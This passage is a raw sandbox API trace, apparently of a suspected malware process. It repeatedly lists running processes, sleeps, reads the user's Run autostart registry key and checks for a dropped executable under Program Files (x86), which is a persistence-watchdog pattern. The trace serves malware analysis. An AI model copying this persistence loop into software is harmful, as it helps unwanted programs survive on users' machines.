RegionSize=0xdea68*=0x10000) returned 0x0 [0303.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.629] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.630] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.630] NtClose (Handle=0x374) returned 0x0 [0303.630] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.630] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.631] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e68) returned 1 [0303.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.631] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.631] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.645] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.647] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.647] NtClose (Handle=0x374) returned 0x0 [0303.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.647] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.647] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540e00) returned 1 [0303.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.647] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0303.647] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540f38) returned 1 [0303.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.677] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.679] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.679] NtClose (Handle=0x374) returned 0x0 [0303.679] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.679] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x374, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0303.679] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5410d8) returned 1 [0303.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.688] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.690] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0303.691] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.691] NtClose (Handle=0x378) returned 0x0 [0303.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.701] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.702] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0303.704] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.704] NtClose (Handle=0x378) returned 0x0 [0303.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.738] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0303.739] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.739] NtClose (Handle=0x378) returned 0x0 [0303.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.789] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0303.790] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.790] NtClose (Handle=0x378) returned 0x0 [0303.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.813] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0303.814] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.814] NtClose (Handle=0x378) returned 0x0 [0303.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.831] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0303.832] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.832] NtClose (Handle=0x378) returned 0x0 [0303.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.843] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.978] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0303.980] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.980] NtClose (Handle=0x378) returned 0x0 [0303.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.038] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.042] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.042] NtClose (Handle=0x378) 